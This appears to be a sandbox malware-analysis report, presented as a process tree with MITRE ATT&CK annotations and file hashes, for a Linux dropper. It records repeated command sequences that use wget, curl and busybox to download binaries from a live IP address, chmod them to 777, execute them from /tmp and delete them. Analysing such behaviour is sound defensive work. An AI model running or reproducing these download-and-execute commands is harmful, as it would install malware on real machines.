/tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO./EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- Executes dropped EXE
PID:1643
-
-
/bin/rmrm EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵PID:1644
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵PID:1645
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- Writes file to tmp directory
PID:1646
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵PID:1647
-
-
/bin/chmodchmod 777 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- File and Directory Permissions Modification
PID:1648
-
-
/tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM./Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- Executes dropped EXE
PID:1649
-
-
/bin/rmrm Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵PID:1650
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵PID:1651
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- Writes file to tmp directory
PID:1652
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵PID:1653
-
-
/bin/chmodchmod 777 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- File and Directory Permissions Modification
PID:1654
-
-
/tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY./o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- Executes dropped EXE
PID:1655
-
-
/bin/rmrm o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵PID:1656
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵PID:1657
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- Writes file to tmp directory
PID:1658
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵PID:1659
-
-
/bin/chmodchmod 777 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- File and Directory Permissions Modification
PID:1660
-
-
/tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB./k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- Executes dropped EXE
PID:1661
-
-
/bin/rmrm k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵PID:1662
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵PID:1663
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- Writes file to tmp directory
PID:1664
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵PID:1665
-
-
/bin/chmodchmod 777 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- File and Directory Permissions Modification
PID:1666
-
-
/tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi./y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- Executes dropped EXE
PID:1667
-
-
/bin/rmrm y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵PID:1668
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵PID:1669
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- Writes file to tmp directory
PID:1670
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵PID:1671
-
-
/bin/chmodchmod 777 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- File and Directory Permissions Modification
PID:1672
-
-
/tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8./3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- Executes dropped EXE
PID:1673
-
-
/bin/rmrm 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵PID:1674
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97